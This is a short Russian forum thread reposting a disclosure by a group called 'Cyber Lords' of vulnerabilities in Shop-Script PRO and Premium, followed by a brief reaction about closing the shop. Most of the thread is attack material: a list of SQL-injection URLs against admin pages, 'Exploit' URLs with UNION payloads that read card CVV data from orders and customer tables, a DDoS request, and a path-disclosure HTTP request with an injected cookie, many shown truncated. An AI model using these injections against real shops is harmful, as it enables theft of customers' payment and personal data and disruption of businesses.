клозед.
Shop Script
- Автор темы qNaJeX
- Дата начала
- Статус
Вообщем вот баги в shop script Массовые уязвимости в Shop-Script PRO & Premium
Команда Cyber Lords опубликовала массовые уязвимости в Shop-Script PRO & Premium всех версий.
1. SQL-injection в зоне администрирования
- http://www.demo.shop-script.ru/premium/adm...ry&customerID=1[SQL]
- http://demo.shop-script.ru/premium/admin.p...ings_groupID=-2[SQL]
- http://demo.shop-script.ru/premium/admin.p...es&orderID=-107[SQL]
- http://shop/index.php?productID=75&discuss...emove_topic=-14[SQL]
- http://demo.shop-script.ru/premium/admin.p...=1114&answer=-9[SQL]
- http://demo.shop-script.ru/premium/admin.p...productID=-1114[SQL]
- http://demo.shop-script.ru/premium/admin.p...&categoryID=-82[SQL]
- http://demo.shop-script.ru/premium/admin.p...es&countryID=-1[SQL]
- http://demo.shop-script.ru/pro/admin.php?d...es&countryID=-1[SQL]
Exploit:
- http://www.demo.shop-script.ru/premium/adm...ull,null,null/*
- http://www.demo.shop-script.ru/premium/adm...ull,null,null/*
- http://www.demo.shop-script.ru/premium/adm...ull,null,null/*
- http://demo.shop-script.ru/premium/admin.p...c_cvv,null,null,
null+from+SS_orders/*&sort=customers_rating&sort_dir=ASC
- http://demo.shop-script.ru/premium/admin.p...null,null+from+
SS_customers/*&sort=customers_rating&sort_dir=ASC
DDoS:
- http://shop/pro/admin.php?dpt=conf&sub=set...current_date)))
2. Раскрытие установочного пути
- http://shop/admin.php?dpt=modules&sub=ship...tting_up=2'
HTTP-запрос:
GET http://demo.shop-script.ru/premium/index.p...ing_results=yes HTTP/1.0
Accept: */*
Referer: http://demo.shop-script.ru/premium/index.php?show_price=yes
Accept-Language: ru
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: demo.shop-script.ru
Cookie: PHPSESSID=9b93a5c8a536267b43a19262a1819c30'
- Автор темы
- Добавить закладку
- #3
Вот засранцы
Закрываенмся тады.
Закрываенмся тады.
- Статус